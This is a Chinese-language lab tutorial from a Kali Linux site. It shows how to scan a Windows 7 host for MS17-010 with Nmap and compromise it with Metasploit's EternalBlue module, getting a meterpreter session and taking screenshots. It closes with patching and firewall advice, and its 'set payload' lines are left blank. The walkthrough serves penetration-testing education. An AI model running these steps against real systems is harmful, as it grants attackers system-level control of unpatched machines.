警告：本文演示的方法仅用于演示且具有攻击性，请读者务必不可以身试法!

漏洞威胁

远程主动发起对漏洞主机135\137\138\139\445端口的扫描,并且能直接获得漏洞主机的系统权限,属于最高严重级别的漏洞。

影响范围

Windows XP	Windows 7	Windows10
Windows Server 2003	Windows Server2008 R2	Windows Server 2012 R2
Windows Vista	Windows 8.1	Windows Server 2016
Windows Server 2008	Windows Server 2012

MS17-010影响的Windows系统版本

测试环境

主机	IP地址	工具
Kali Linux	192.168.144.128	Nmap
Windows 7	192.168.144.129	Metasploit

测试环境

Nmap扫描漏洞

nmap --script=vuln 192.168.144.129

扫描完成后发现存在MS17-010漏洞

打开Metasploit

Kali Linux终端内输入：

msfconsole

Metasploit

使用永恒之蓝攻击模块

use exploit/windows/smb/ms17_010_eternalblue

设置攻击载荷

set payload

set payload

设置rhosts

set rhosts 192.168.144.129

开始攻击

exploit

运行成功会出现meterpreter >
Meterpreter 是 Metasploit 的一个扩展模块，可以调用 Metasploit 的一些功能，
对目标系统进行更深入的渗透，如获取屏幕、上传/下载文件、创建持久后门等。

捕获屏幕

screenshot

分享一些命令

MS17-010修复方案

受影响的系统版本可以参照：

https://docs.microsoft.com/zh-cn/security-updates/securitybulletins/2017/ms17-010

关闭445端口。
打开防火墙，安装安全软件。
安装对应补丁。

1 本网站名称：Kali中文資訊
2 本站永久网址：https://kali.wiki/
3 本网站的文章部分内容来源于网络，仅供大家学习与参考，请务必在遵守当地法律法规的前提下使用本站文献！
4 本站一切资源不代表本站立场，并不代表本站赞同其观点和对其真实性负责。
5 本站一律禁止以任何方式发布或转载任何违法的相关信息，访客发现请向站长举报
6 本站资源部分存储在云盘，如发现链接失效，请联系我们我们会第一时间更新。
7 联系邮箱：Kali@KALI.HK.CN

THE END